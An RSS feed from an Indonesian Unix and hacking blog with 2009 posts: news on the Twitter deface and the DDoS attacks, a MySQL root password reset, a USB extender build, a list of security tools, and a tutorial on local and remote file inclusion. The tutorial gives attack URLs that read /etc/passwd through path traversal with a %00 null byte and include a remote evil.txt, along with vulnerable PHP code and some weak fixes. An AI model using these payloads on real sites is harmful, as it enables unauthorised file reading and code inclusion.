<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>adhit.web.id™ &#187; Hacking</title>
	<atom:link href="http://adhit.web.id/tag/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://adhit.web.id</link>
	<description>my daily unix notes</description>
	<lastBuildDate>Tue, 06 Sep 2011 13:50:19 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<image>
<link>http://adhit.web.id</link>
<url>http://adhit.web.id/wp-content/plugins/maxblogpress-favicon/icons/favicon-56.ico</url>
<title>adhit.web.id™</title>
</image>
		<item>
		<title>Hacker Iran Berhasil Men-Deface Twitter</title>
		<link>http://adhit.web.id/hacker-iran-berhasil-men-deface-twitter/</link>
		<comments>http://adhit.web.id/hacker-iran-berhasil-men-deface-twitter/#comments</comments>
		<pubDate>Sat, 19 Dec 2009 16:23:45 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[IT News]]></category>
		<category><![CDATA[Berita]]></category>
		<category><![CDATA[Deface]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=665</guid>
		<description><![CDATA[Situs microblogging terkemuka Twitter, Jumat kemarin telah berhasil di-deface oleh sekelompok hacker dari Iran yang menamakan dirinya “Iranian Cyber Army”.  Dalam situs yang berhasil di-deface itu mereka menuliskan : Iranian Cyber Army THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY iRANiAN.CYBER.ARMY@GMAIL.COM U.S.A. Think They Controlling And Managing Internet By Their Access, But They Don’t, [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://adhit.web.id/wp-content/uploads/2009/12/twitter_hacked.jpg"><img class="aligncenter size-full wp-image-667" title="twitter_hacked" src="http://adhit.web.id/wp-content/uploads/2009/12/twitter_hacked.jpg" alt="twitter hacked Hacker Iran Berhasil Men Deface Twitter" width="630" height="393" /></a>Situs <em>microblogging</em> terkemuka Twitter, Jumat kemarin telah berhasil di-<em>deface</em> oleh sekelompok hacker dari Iran yang menamakan dirinya “<strong>Iranian Cyber Army</strong>”.  Dalam situs yang berhasil di-deface itu mereka menuliskan :</p>
<p><span id="more-665"></span></p>
<blockquote><p>Iranian Cyber Army</p>
<p>THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY</p>
<p>iRANiAN.CYBER.ARMY@GMAIL.COM</p>
<p>U.S.A. Think They Controlling And Managing Internet By Their Access, But They Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….</p>
<p>NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?</p>
<p>WE PUSH THEM IN EMBARGO LIST <img src='http://adhit.web.id/wp-includes/images/smilies/icon_wink.gif' alt="icon wink Hacker Iran Berhasil Men Deface Twitter" class='wp-smiley' title="Hacker Iran Berhasil Men Deface Twitter" /> </p>
<p>Take Care.</p></blockquote>
<p style="text-align: justify;"><a href="http://adhit.web.id/wp-content/uploads/2009/12/google-twitter-hacked.jpg"><img class="aligncenter size-full wp-image-668" title="google-twitter-hacked" src="http://adhit.web.id/wp-content/uploads/2009/12/google-twitter-hacked.jpg" alt="google twitter hacked Hacker Iran Berhasil Men Deface Twitter" width="620" height="353" /></a>Dengan adanya serangan deface ini , status.twitter.com beserta sub domainnya pun lumpuh total dan pastinya pengguna Twitter tidak dapat mengakses akun mereka. Namun kejadian ini tidak berlangsung lama, pihak Twitter telah berhasil memulihkannya seperti semula sehingga para penggunanya bisa kembali mengakses akun mereka. Mekanisme serangannya pun diduga bahwa sekelompok hacker itu telah mengalihkan DNS Twitter ke sebuah halaman yang sudah mereka siapkan seperti pada gambar diatas.</p>
<p style="text-align: justify;">Pihak Twitter sendiri tidak ingin berspekulasi bahwa serangan itu benar-benar dilakukan oleh orang Iran, namun jika tuduhan itu cukup logis jika dikaitkan dengan konflik yang terjadi di Iran selama pemilu tahun 2009 yang terjadi di Iran dimana Twitter telah menjadi alat untuk melancarkan aksi protest sekelompok warga Iran.</p>
<p style="text-align: justify;">Setelah <a title="1000 Varian Koobface Siap Serang Facebok" href="1000 Varian Koobface Siap Serang Facebok" target="_self">Koobaface</a> dan <a title="Koobface Terbaru 10x Lebih Dashyat Serang Jejaring Sosial" href="http://adhit.web.id/koobface-terbaru-10x-lebih-dashyat-serang-jejaring-sosial/" target="_self">varian terbarunya</a>, kemudian <a title="Twitter Jadi Korban Phising" href="http://adhit.web.id/twitter-jadi-korban-phising/" target="_self">phising</a>, sekarang deface, besok apalagi ya? <img src='http://adhit.web.id/wp-includes/images/smilies/icon_biggrin.gif' alt="icon biggrin Hacker Iran Berhasil Men Deface Twitter" class='wp-smiley' title="Hacker Iran Berhasil Men Deface Twitter" /> </p>
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/hacker-iran-berhasil-men-deface-twitter/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Reset Password root Database MySQL di Linux</title>
		<link>http://adhit.web.id/reset-password-root-database-mysql-di-linux/</link>
		<comments>http://adhit.web.id/reset-password-root-database-mysql-di-linux/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 15:08:43 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[MySQL]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Reset]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=613</guid>
		<description><![CDATA[MySQL adalah Relational Database Management System (RDBMS) yang merupakan turunan salah satu konsep utama dalam database yaitu SQL (Structured Query Language). SQL sendiri adalah sebuah konsep pengoperasian database, terutama untuk pemilihan atau seleksi dan pemasukan data, yang memungkinkan pengoperasian data dikerjakan dengan mudah secara otomatis. Kelebihan dari suatu sistem database (DBMS) dapat diketahui dari cara [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://adhit.web.id/wp-content/uploads/2009/11/mysql_logo.gif"><img class="alignleft size-full wp-image-614" title="mysql_logo" src="http://adhit.web.id/wp-content/uploads/2009/11/mysql_logo.gif" alt="mysql logo Reset Password root Database MySQL di Linux" width="250" height="128" /></a>MySQL adalah <em>Relational Database Management System (RDBMS)</em> yang merupakan turunan salah satu konsep utama dalam database yaitu <em>SQL (Structured Query Language).</em> SQL sendiri adalah sebuah konsep pengoperasian database, terutama untuk pemilihan atau seleksi dan pemasukan data, yang memungkinkan pengoperasian data dikerjakan dengan mudah secara otomatis. Kelebihan dari suatu sistem database (DBMS) dapat diketahui dari cara kerja <em>optimizer</em>-nya dalam melakukan proses perintah-perintah SQL, yang dibuat oleh user maupun program-program aplikasinya. Sebagai database server, MySQL dapat dikatakan lebih unggul dibandingkan database server lainnya dalam query data. MySQL juga memiliki portabilitas yang tinggi sehingga dapat berjalan stabil pada berbagai sistem operasi seperti Windows, Linux, FreeBSD, Mac Os X Server, Solaris, dan masih banyak lagi.</p>
<p style="text-align: justify;">Namun dibalik kehandalannya pernahkah Anda lupa dengan password root MySQL Anda?Jika Anda mengalami hal seperti ini, jangan panik dahulu. Apalagi sampai menginstal ulang MySQL Anda. Berikut cara mereset password root MySQL Anda, sistem yang digunakan yaitu Linux distro Ubuntu :</p>
<p><span id="more-613"></span>1. Buka 2 console atau terminal Anda, bisa dengan kombinasi Ctrl+Alt+F1( console 1), Ctrl+Alt+F2(console 2), dst.</p>
<p>2. Pada console 1, matikan service MySQL Anda, dengan mengetik perintah :</p>
<blockquote><p>$sudo /etc/init.d/mysql stop</p></blockquote>
<p>3. Pada console 2 aktifkan kembali service MySQL dengan <em>option -–skip-grant-tables</em>, dengan mengetik perintah:</p>
<blockquote><p>$sudo mysqld &#8211;skip-grant-tables</p></blockquote>
<p>4. Balik ke console 1, jalankan MySQL client dengan mengetik perintah:</p>
<blockquote><p>$mysql</p></blockquote>
<p>5. Pilih database mysql</p>
<blockquote><p>mysql&gt; use mysql;</p></blockquote>
<p>6. Kemudian ubah password root dengan melakukan query sebagai berikut:</p>
<blockquote><p>mysql&gt; update user set Password=password(&#8216;password_baruku&#8217;) where User= &#8216;root&#8217;;</p></blockquote>
<p>7. Lakukan flush privileges:</p>
<blockquote><p>mysql&gt; flush privileges;</p></blockquote>
<p>8. Kembali ke console 1 matikan service MySQL dengan cara:</p>
<blockquote><p>$sudo killall mysqld</p></blockquote>
<p>9. Jalankan kembali service MySQL pada console 1 dengan cara:</p>
<blockquote><p>$/etc/init.d/mysql start</p></blockquote>
<p>Mudah-mudahan bermanfaat.</p>
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/reset-password-root-database-mysql-di-linux/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Local File Inclusion (LFI) dan Remote File Inclusion (RFI)</title>
		<link>http://adhit.web.id/local-file-inclusion-lfi-dan-remote-file-inclusion-rfi/</link>
		<comments>http://adhit.web.id/local-file-inclusion-lfi-dan-remote-file-inclusion-rfi/#comments</comments>
		<pubDate>Sat, 29 Aug 2009 08:53:21 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[LFI]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[RFI]]></category>
		<category><![CDATA[Web Hacking]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=410</guid>
		<description><![CDATA[LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL. RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server. Penjelasan Fungsi-fungsi yang dapat menyebabkan LFI/RFI: Kode: include(); include_once(); require(); require_once(); Dengan syarat pada konfigurasi php [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://adhit.web.id/wp-content/uploads/2009/08/hack_web.jpg"><img class="alignleft size-medium wp-image-411" title="hack_web" src="http://adhit.web.id/wp-content/uploads/2009/08/hack_web-280x300.jpg" alt="hack web 280x300 Local File Inclusion (LFI) dan Remote File Inclusion (RFI)" width="115" height="124" /></a>LFI (<em>Local File Inclusion</em>) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.</p>
<p style="text-align: justify;">RFI (<em>Remote File Inclusion</em>) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.</p>
<p style="text-align: justify;"><strong>Penjelasan</strong></p>
<p style="text-align: justify;">Fungsi-fungsi yang dapat menyebabkan LFI/RFI:</p>
<p style="text-align: justify;">Kode:</p>
<blockquote style="text-align: justify;"><p>include();</p>
<p>include_once();</p>
<p>require();</p>
<p>require_once();</p></blockquote>
<p style="text-align: justify;"><span id="more-410"></span>Dengan syarat pada konfigurasi php di server:</p>
<blockquote style="text-align: justify;"><p>allow_url_include = on</p>
<p>allow_url_fopen = on</p>
<p>magic_quotes_gpc = off</p></blockquote>
<p style="text-align: justify;">contoh:</p>
<p style="text-align: justify;">misalkan kita punya file index.php dengan content kodenya seperti ini,</p>
<p style="text-align: justify;">Code:</p>
<blockquote style="text-align: justify;"><p>&lt;?php</p>
<p>include &#8220;../$_GET[imagefile]&#8220;;</p>
<p>?&gt;</p></blockquote>
<p style="text-align: justify;">misal $imagefile=image.php</p>
<p style="text-align: justify;">mungkin di url akan terlihat seperti ini bentuknya</p>
<p style="text-align: justify;">Code:</p>
<blockquote style="text-align: justify;"><p>http://www.[target].com/index.php?imagefile=image.php</p></blockquote>
<p style="text-align: justify;">maka script ini akan menampilkan halaman image.php.</p>
<p style="text-align: justify;">Disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.</p>
<p style="text-align: justify;">Misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd &lt;&lt; dengan jumlah “../” itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target.</p>
<p style="text-align: justify;">Tapi seandainya terdapat error seperti di bawah ini:</p>
<blockquote style="text-align: justify;"><p>Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2</p></blockquote>
<p style="text-align: justify;">Ternyata pada passwd ditambah dengan extensi “.php” berarti code yang digunakan untuk include adalah seperti ini:</p>
<p style="text-align: justify;">Kode:</p>
<blockquote style="text-align: justify;"><p>&lt;?php</p>
<p>include($_GET[imagefile].&#8221;.php&#8221;);</p>
<p>?&gt;</p></blockquote>
<p style="text-align: justify;">Untuk dapat mengelabui script tersebut kita bisa menggunakan %00 (dengan syarat <em>magic_quotes_gpc = off</em>) jadi dibelakang /etc/passwd kita tambahkan %00 seperti</p>
<blockquote style="text-align: justify;"><p>http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd%00</p></blockquote>
<p style="text-align: justify;">lalu untuk apa %00? yaitu untuk menghilangkan karakter apapun setelah passwd.</p>
<p style="text-align: justify;">* %00 ini disebut <em>null injection</em>.</p>
<p style="text-align: justify;">Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:</p>
<blockquote style="text-align: justify;"><p>http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt</p></blockquote>
<p style="text-align: justify;">dengan file evil.txt misal berisi “hacked by H4CK3R”</p>
<p style="text-align: justify;">jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.</p>
<p style="text-align: justify;"><strong>Pencegahan</strong></p>
<p style="text-align: justify;">Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu</p>
<p style="text-align: justify;">1. Memvalidasi variable.</p>
<p style="text-align: justify;">2. Mengkonfigurasi kembali settingan php pada server website Anda.</p>
<blockquote style="text-align: justify;"><p>allow_url_include = off</p>
<p>allow_url_fopen = off</p>
<p>magic_quotes_gpc = on</p></blockquote>
<p style="text-align: justify;">3. pada include mungkin bisa ditambahkan “./”</p>
<p style="text-align: justify;">jadinya seperti ini,</p>
<p style="text-align: justify;">Code:</p>
<blockquote style="text-align: justify;"><p>include(&#8220;./&#8221;$_GET[imagefile].&#8221;.php&#8221;);</p></blockquote>
<p style="text-align: justify;">maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.</p>
<blockquote style="text-align: justify;"><p>http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt</p></blockquote>
<p style="text-align: justify;">Dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.</p>
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/local-file-inclusion-lfi-dan-remote-file-inclusion-rfi/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>Twitter, Facebook, dan Google Kena Serangan DDOS Bersamaan</title>
		<link>http://adhit.web.id/twitter-facebook-dan-google-kena-ddos-bersamaan/</link>
		<comments>http://adhit.web.id/twitter-facebook-dan-google-kena-ddos-bersamaan/#comments</comments>
		<pubDate>Fri, 07 Aug 2009 16:17:25 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[IT News]]></category>
		<category><![CDATA[Berita]]></category>
		<category><![CDATA[DDOS]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=331</guid>
		<description><![CDATA[Serangan cyber telah menimpa Twitter, Facebook, dan Google, dengan mengganggu layanan Twitter dan menyebabkan kekacauan di Facebook dan Google. Twitter mengalami down lebih dari satu jam di hari Kamis (06/8) pagi, sebelum perusahaan yang berbasis di California tersebut kembali online. “Serangan DDoS (Distributed Denial of Service) tersebut memang sempat mengganggu layanan kami, walaupun kami sudah [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://adhit.web.id/wp-content/uploads/2009/08/ddos.jpg"><img class="alignleft size-full wp-image-332" title="ddos" src="http://adhit.web.id/wp-content/uploads/2009/08/ddos.jpg" alt="ddos Twitter, Facebook, dan Google Kena Serangan DDOS Bersamaan" width="220" height="198" /></a>Serangan cyber telah menimpa Twitter, Facebook, dan Google, dengan mengganggu layanan Twitter dan menyebabkan kekacauan di Facebook dan Google. Twitter mengalami down lebih dari satu jam di hari Kamis (06/8) pagi, sebelum perusahaan yang berbasis di California tersebut kembali online. “Serangan DDoS (Distributed Denial of Service) tersebut memang sempat mengganggu layanan kami, walaupun kami sudah me-recover secara lengkap.” ungkap co-founder Twitter, Biz Stone. Bahkan, hingga Kamis sore, walaupun sudah di-recover, serangan masih terjadi dan masih sporadic sehingga beberapa orang tidak bisa posting ataau follow dari Twitter.</p>
<p style="text-align: justify;"><span id="more-331"></span>Sementara Facebook juga mengalami gangguan yang sama di Kamis pagi. “Tidak ada data pengguna yang terinfeksi dan kami sudah me-restore full akses ke situs Facebook untuk user. Namun, kami juga tetap memantau situasi.” ungkap juru bicara Facebook, Brandee Barker. Sementara itu, serangan yang sama juga menimpa website Google, namun Google berhasil menangkisnya. “System Google mampu mencegah adanya serangan yang berimbas kepada layanan kami. Kemudian kami mengajak perusahaan lain yang terkena DDoS untuk menangani serangan tersebut.” ungkap juru bicara Google, Nate Tyler. Untuk itu, Facebook, Twitter dan Google kemudian bekerja sama untuk menginvestigasi serangan DDoS tersebut.</p>
<p style="text-align: justify;">DDoS sendiri merupakan serangan dari hacker yang menggunakan beberapa computer ‘zombie’ yang terinfeksi dengan virus, yang dikomando untuk mengunjungi sebuah website secara bersamaan. Akibatnya adalah dapat mengganggu server website, memperlambat kinerja layanan atau mematikan website. Serangan DDoS menghampiri Twitter sekitar pukul 6:00 am waktu local dan menyebabkan layanan tersebut down secara temporer. Kemudian akses ke website Twitter menjadi lambat dan memberikan pesan kepada user bahwa koneksi sedang ‘timed out’ karena Twitter terlalu lama merespon.</p>
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/twitter-facebook-dan-google-kena-ddos-bersamaan/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Membuat USB Extender Menggunakan Kabel UTP</title>
		<link>http://adhit.web.id/membuat-usb-extender-menggunakan-kabel-utp/</link>
		<comments>http://adhit.web.id/membuat-usb-extender-menggunakan-kabel-utp/#comments</comments>
		<pubDate>Thu, 02 Jul 2009 17:50:54 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[LAN]]></category>
		<category><![CDATA[USB]]></category>
		<category><![CDATA[USB Extender]]></category>
		<category><![CDATA[UTP]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=150</guid>
		<description><![CDATA[Pernahkan Anda menghadapi situasi dimana Anda ingin mengintai suatu tempat dengan menggunakan webcam USB, namun kabel USB yang menghubungkan webcam dan PC Anda terlalu pendek dikarenakan lokasi penempatan webcam Anda terlalu jauh dengan PC Anda? Tentu Anda membutuhkan yang namanya USB Extender yang berfungsi untuk &#8216;memanjangkan&#8217; kabel USB webcam Anda. Tentu selain penerapannya pada webcam [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://adhit.web.id/wp-content/uploads/2009/07/usb_logo.gif"><img class="alignleft size-full wp-image-155" title="usb_logo" src="http://adhit.web.id/wp-content/uploads/2009/07/usb_logo.gif" alt="usb logo Membuat USB Extender Menggunakan Kabel UTP" width="82" height="143" /></a>Pernahkan Anda menghadapi situasi dimana Anda ingin mengintai suatu tempat dengan menggunakan webcam USB, namun kabel USB yang menghubungkan webcam dan PC Anda terlalu pendek dikarenakan lokasi penempatan webcam Anda terlalu jauh dengan PC Anda? Tentu Anda membutuhkan yang namanya USB Extender yang berfungsi untuk &#8216;memanjangkan&#8217; kabel USB webcam Anda. Tentu selain penerapannya pada webcam bisa juga pada periperal-periperal yang menggunakan kabel USB seperti printer dsb. Selain Anda bisa membelinya di toko periperal PC, Anda juga dapat membuatnya sendiri dengan hanya bermodalkan kabel UTP yang biasa digunakan menghubungkan PC dalam LAN.</p>
<p style="text-align: justify;">Berikut bahan-bahan yang dibutuhkan :</p>
<p style="text-align: justify;"><span id="more-150"></span></p>
<p style="text-align: justify;">1. Kabel USB biasa, standard aja yang 1m atau 0.5m.</p>
<p style="text-align: justify;">2. Kabel LAN / kabel UTP buat jaringan.</p>
<p style="text-align: justify;"><strong>Langkah 1 : </strong></p>
<p style="text-align: justify;">Kabel USB dites dulu menggunakan USB flashdisk di komputer, masih berfungsi atau tidak. Kalau masih OK, potong jadi 2 bagian. Biasanya ada warna merah, hitam, dan putih, hijau. Merah dan hitam biasanya untuk tegangan daya 5V. Hijau putih biasanya merupakan kabel data USB.</p>
<p><a href="http://adhit.web.id/wp-content/uploads/2009/07/kabel_usb_potong.jpg"><img class="aligncenter size-full wp-image-151" title="kabel_usb_potong" src="http://adhit.web.id/wp-content/uploads/2009/07/kabel_usb_potong.jpg" alt="kabel usb potong Membuat USB Extender Menggunakan Kabel UTP" width="320" height="195" /></a></p>
<p style="text-align: justify;"><strong>Langkah 2 :</strong></p>
<p style="text-align: justify;">Potong dan kupas ujung-ujung kabel LAN. Dari kabel LAN ini ada 8 warna. Dari 8 ujung kabel LAN tadi, gabungkan beberapa pasang sehingga tinggal 4 ujung kabel LAN.</p>
<p style="text-align: justify;">* gabungkan kabel putih oranye dengan oranye (2 kabel jadi 1)</p>
<p style="text-align: justify;">* kabel putih hijau (1 kabel)</p>
<p style="text-align: justify;">* kabel hijau (1 kabel)</p>
<p style="text-align: justify;">* kemudian gabungkan kabel putih biru, biru, putih coklat, coklat (4 kabel jadi 1)</p>
<p><a href="http://adhit.web.id/wp-content/uploads/2009/07/kabel_lan_potong.jpg"><img class="aligncenter size-full wp-image-152" title="kabel_lan_potong" src="http://adhit.web.id/wp-content/uploads/2009/07/kabel_lan_potong.jpg" alt="kabel lan potong Membuat USB Extender Menggunakan Kabel UTP" width="159" height="164" /></a></p>
<p style="text-align: justify;"><strong>Langkah 3 : </strong></p>
<p style="text-align: justify;">Sambung ujung-ujung kabel USB dengan ujung kabel LAN sbb :</p>
<p style="text-align: justify;">* putih oranye – oranye (2 kabel) (UTP) = merah (USB)</p>
<p style="text-align: justify;">* putih hijau (1 kabel) (UTP) = putih (USB)</p>
<p style="text-align: justify;">* hijau (1 kabel) (UTP) = hijau (USB)</p>
<p style="text-align: justify;">* putih biru, biru, putih coklat, coklat (4 kabel) (UTP) = hitam (USB)</p>
<p style="text-align: justify;">Pastikan masing-masing sambungan di isolasi pakai selotip dengan rapat</p>
<p style="text-align: justify;"><strong>Langkah 4 : </strong></p>
<p style="text-align: justify;">Merupakan langkah yang paling penting : set USB port speed pada motherboard komputer agar menjadi USB 1.1, jangan USB 2.0. USB 1.1 punya kecepatan maksimum 10Mbps, jadi lebih reliable untuk di tarik jarak jauh dibandingkan dengan USB 2.0.</p>
<p><a href="http://adhit.web.id/wp-content/uploads/2009/07/usb_ekstender.jpg"><img class="aligncenter size-full wp-image-153" title="usb_ekstender" src="http://adhit.web.id/wp-content/uploads/2009/07/usb_ekstender.jpg" alt="usb ekstender Membuat USB Extender Menggunakan Kabel UTP" width="202" height="221" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://adhit.web.id/membuat-usb-extender-menggunakan-kabel-utp/feed/</wfw:commentRss>
		<slash:comments>27</slash:comments>
		</item>
		<item>
		<title>Security (Hacking) Tools di Ubuntu</title>
		<link>http://adhit.web.id/security-hacking-tools-di-ubuntu/</link>
		<comments>http://adhit.web.id/security-hacking-tools-di-ubuntu/#comments</comments>
		<pubDate>Mon, 29 Jun 2009 19:30:33 +0000</pubDate>
		<dc:creator>adhit</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[tool]]></category>

		<guid isPermaLink="false">http://adhit.web.id/?p=120</guid>
		<description><![CDATA[Wireshark &#8211; Network Traffic Analyzer Wireshark adalah tools untuk menganalisis lalu lintas paket data di jaringan. Lazim dipanggil sebagi SNIFFER (pengintai). Sniffer adalah tools yang berkemampuan menangkap paket data dalam jaringan Wireshark mampu mendecode paket data dalam banyak jenis protokol. Tersedia pada operasi sistem linux dan windows. Install wireshark: Buka terminal (seperti command prompt di [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://adhit.web.id/wp-content/uploads/2009/06/hack.png"><img class="aligncenter size-full wp-image-121" title="hack" src="http://adhit.web.id/wp-content/uploads/2009/06/hack.png" alt="hack Security (Hacking) Tools di Ubuntu" width="480" height="360" /></a></p>
<p style="text-align: justify;"><strong>Wireshark &#8211; Network Traffic Analyzer</strong></p>
<p style="text-align: justify;">Wireshark adalah tools untuk menganalisis lalu lintas paket data di jaringan. Lazim dipanggil sebagi SNIFFER (pengintai). Sniffer adalah tools yang berkemampuan menangkap paket data dalam jaringan Wireshark mampu mendecode paket data dalam banyak jenis protokol. Tersedia pada operasi sistem linux dan windows.</p>
<p style="text-align: justify;">Install wireshark:</p>
<p style="text-align: justify;">Buka terminal (seperti command prompt di windows), lalu ketikkan</p>
<blockquote style="text-align: justify;"><p>#sudo aptitude install wireshark</p></blockquote>
<p style="text-align: justify;"><span id="more-120"></span></p>
<p style="text-align: justify;"><strong>Nessus &#8211; Remote Network Security Auditor</strong></p>
<p style="text-align: justify;">Nessus adalah scanner untuk mengetahui celah keamanan komputer, baik komputer anda atau komputer siapapun. Kemampuannya yang lengkap sebagai Vulnerability Scanner adalah nyata karena didukung dengan fitur high speed discovery, configuration auditing, asset profiling, sensitive data discovery, dan vulnerability analysis of our security posture.</p>
<p style="text-align: justify;">Install NESSUS:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install nessus</p></blockquote>
<p style="text-align: justify;"><strong>NMAP – The Network Mapper</strong></p>
<p style="text-align: justify;">Adalah tools pemetaan jaringan (network) terbaik yang pernah ada sejauh ini. Panggunaannya yang praktis, konfigurasi yang mudah, dan kehandalannya dalam memetakan jaringan komputer di manapun. Dengan Nmap, anda dapat mengetahui komputer-komputer (hosts) apa saja yang sedang terhubung dalam sebuah jaringan, apa service (aplikasi) yang sedang dijalankan komputer itu (host), apa sistem operasi komputer yang dipakai, apa tipe firewall yang digunakan, dan karakteristik lainnya dari komputer.</p>
<p style="text-align: justify;">Install NMAP:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install nmap</p></blockquote>
<p style="text-align: justify;"><strong>Etherape &#8211; Graphical Network Monitor Modeled after Etherman</strong></p>
<p style="text-align: justify;">Etherape adalah tools untuk memonitor jaringan dengan tampilan grafis. Tools ini dilengkapi dengan kemampuan menghasilkan grafik dari lapisan jaringan, mode IP dan TCP, serta menampilkan kegiatan network (jaringan) secara grafis. Kita dapat memfilter traffic apa saja yang mau ditampilkan secara grafis.</p>
<p style="text-align: justify;">Install Etherape:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install etherape</p></blockquote>
<p style="text-align: justify;"><strong>Kismet</strong></p>
<p style="text-align: justify;">Siapa yang tak kenal tools ini? Sebuah tools terbaik dan satu-satunya di dunia yang mampu mendeteksi setiap jaringan (network) wireless dengan sempurna tanpa cacat sekalipun jaringan tersebut telah berusaha disembunyikan. Dengan tools standar, kita kadang terkecoh bahwa ternyata ada jaringan yang tetap ada namun tak terpantau oleh komputer kita. Kismet adalah detektor jaringan wireless, sniffer, dan sistem pendeteksi penyusup pada komputer. Kismet dapat bekerja pada beragam tipe wireless card, dengan syarat wireless card kita memiliki fitur MODE MONITOR. Kismet dapat melakukan sniffing pada traffic-traffic 802.11b, 802.11a, dan 802.11g.</p>
<p style="text-align: justify;">Install Kismet:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install kismet</p></blockquote>
<p style="text-align: justify;"><strong>Chkrootkit &#8211; Checks for signs of rootkits on the local system</strong></p>
<p style="text-align: justify;">Tools ini berfungsi melakukan identifikasi apakah sebuah komputer diinfeksi dengan rootkit. Apa itu tootkit? Ini dia jenis-jenis rootkit:</p>
<p style="text-align: justify;">1. lrk3, lrk4, lrk5, lrk6 (and some variants);</p>
<p style="text-align: justify;">2. Solaris rootkit;</p>
<p style="text-align: justify;">3. FreeBSD rootkit;</p>
<p style="text-align: justify;">4. t0rn (including latest variant);</p>
<p style="text-align: justify;">5. Ambient’s Rootkit for Linux (ARK);</p>
<p style="text-align: justify;">6. Ramen Worm;</p>
<p style="text-align: justify;">7. rh[67]-shaper;</p>
<p style="text-align: justify;">8. RSHA;</p>
<p style="text-align: justify;">9. Romanian rootkit;</p>
<p style="text-align: justify;">10. RK17;</p>
<p style="text-align: justify;">11. Lion Worm;</p>
<p style="text-align: justify;">12. Adore Worm.</p>
<p style="text-align: justify;">Install Chkrootkit:</p>
<blockquote style="text-align: justify;"><p>#sudo apt-get install chkrootkit</p></blockquote>
